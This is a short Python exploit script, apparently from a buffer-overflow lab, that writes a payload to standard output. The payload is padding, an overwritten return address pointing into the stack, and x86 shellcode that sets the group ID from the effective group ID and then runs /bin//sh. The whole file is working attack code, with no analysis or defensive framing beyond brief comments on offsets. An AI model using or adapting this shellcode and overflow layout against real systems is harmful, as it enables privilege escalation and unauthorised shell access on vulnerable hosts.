#!/usr/bin/env python3
import sys
shellcode = b"\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a\
\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\
\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\
\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

# distance between door and return address = 20
# return address takes 4 at 0xbffff7bc
# shellcode takes 39
payload = bytearray(0xaa for i in range(20 + 4 + 39))

payload[20:24] = (0xbffff7c0).to_bytes(4,byteorder='little') #put the address of the next word in the return address

payload[24:] = shellcode

#with open('foo.txt', 'wb') as f:
#    f.write(payload)

sys.stdout.buffer.write(payload)
